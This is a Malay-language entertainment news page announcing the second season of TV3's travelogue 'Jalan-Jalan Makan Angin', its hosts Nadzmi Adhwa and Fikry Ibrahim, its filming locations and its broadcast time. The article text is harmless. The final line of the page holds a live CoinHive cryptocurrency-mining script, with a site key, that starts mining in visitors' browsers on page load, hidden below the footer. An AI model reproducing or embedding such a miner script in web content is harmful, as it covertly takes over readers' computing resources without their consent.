© Copyright 2017, All Rights Reserved
Home / Hiburan / Elemen drama berbeza setiap episod

Elemen drama berbeza setiap episod

Program travelog Jalan-Jalan Makan Angin (JJMA) kembali menghiburkan penonton dengan gandingan pelakon Nadzmi Adhwa dan Fikry Ibrahim selaku pengacara musim kedua.

Travelog terbitan stesen televisyen TV3 ini yang turut menyelitkan elemen drama setiap minggu dan sesuai untuk penonton yang sentiasa mencari lokasi menarik serta unik untuk dikunjungi.

Pengurus Besar, Kumpulan Pengurusan Jenama dan Rancangan, TV3 dan TV9, Rangkaian Televisyen Media Prima Berhad, Siti Nurlisia Mohd Nadzri berkata Fikry dipilih sebagai pengacara musim baru ini kerana Anas Ridzuan mempunyai komitmen lain.

“Kami ‘melamar’ Fikry sebaik dia tamat menyertai sebuah program realiti. Dia mempunyai perwatakan dan aura menarik yang diperlukan untuk Jalan-Jalan Makan Angin,” katanya.

Menurut Siti Nurlisia, produksi mahu menampilkan kelainan dari program travelog lain dengan menampilkan elemen drama serta muzik video berbeza pada setiap episod.

“Diharapkan kelebihan Fikry sebagai pelawak dan memiliki paras rupa menarik dapat menarik minat penonton untuk mengikuti perjalanan pengacara berkenaan,” katanya.

Minggu lalu, destinasi pertama Fikry dan Adhwa menikmati keindahan alam sekitar di Tanah Aina Farrah Soraya, Raub dan juga The Plantation, Karak di Pahang.

JJMA turut memperkenalkan tempat mempro­mosikan kepelbagaian budaya, makanan dan keunikan reka bentuk tersendiri di setiap lokasi persinggahan.

Antara lokasi menarik yang bakal dipaparkan ialah Dashbox Hotel (Cyberjaya), Bamboo Village (Kuala Lumpur), Adeline Villa (Gopeng), The Rucksack Caratel (Melaka), Sabah Tea Resort (Ranau), Mongolian Yurt (Kundasang), The Replacement Lodge dan Kitchen (Johor Bahru).

Pastikan anda tidak ketinggalan menonton JJMA setiap Ahad, jam 11.30 pagi di TV3.

Maklumat lanjut program ini boleh layari laman web www.tv3.com.my dan ikuti juga laman sosial Facebook, Twitter dan Instagram @TV3Malaysia.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Idayu juara AF Megastar 2017

SHAH ALAM: Idayu dinobatkan sebagai Juara AF Megastar sekali gus meraih wang ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();